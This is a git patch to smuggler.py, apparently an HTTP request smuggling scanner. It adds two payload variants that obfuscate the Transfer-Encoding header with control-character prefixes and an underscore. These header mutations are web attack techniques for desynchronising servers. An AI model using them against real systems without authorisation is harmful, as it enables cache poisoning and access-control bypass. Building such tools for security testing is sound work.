From f76feb5de7674725673fa1997d762564cfbfecfb Mon Sep 17 00:00:00 2001
From: Gwen <g@10degres.net>
Date: Thu, 24 Nov 2022 10:40:55 +0100
Subject: [PATCH] issue #13

---
 smuggler.py | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/smuggler.py b/smuggler.py
index bb2a70b..9359bcf 100755
--- a/smuggler.py
+++ b/smuggler.py
@@ -144,6 +144,10 @@ def banner():
     'suffix1_127',
     'suffix1_160',
     'suffix1_255',
+
+    # https://twitter.com/mame82/status/1265903964568145921
+    'marcusmengs1',
+    'marcusmengs2',
 ]
 # t_registered_method = [
 #     'contentEnc',
@@ -153,6 +157,14 @@ class attackMethod:
     def update_content_length( self, msg, cl ):
         return msg.replace( 'Content-Length: 0', 'Content-Length: '+str(cl) )
 
+    def marcusmengs1( self, msg ):
+        msg = msg.replace( 'Transfer-Encoding', chr(1)+'Transfer_Encoding' )
+        return msg
+
+    def marcusmengs2( self, msg ):
+        msg = msg.replace( 'Transfer-Encoding', chr(15)+'Transfer_Encoding' )
+        return msg
+
     def underjoin1( self, msg ):
         msg = msg.replace( 'Transfer-Encoding', 'Transfer_Encoding' )
         return msg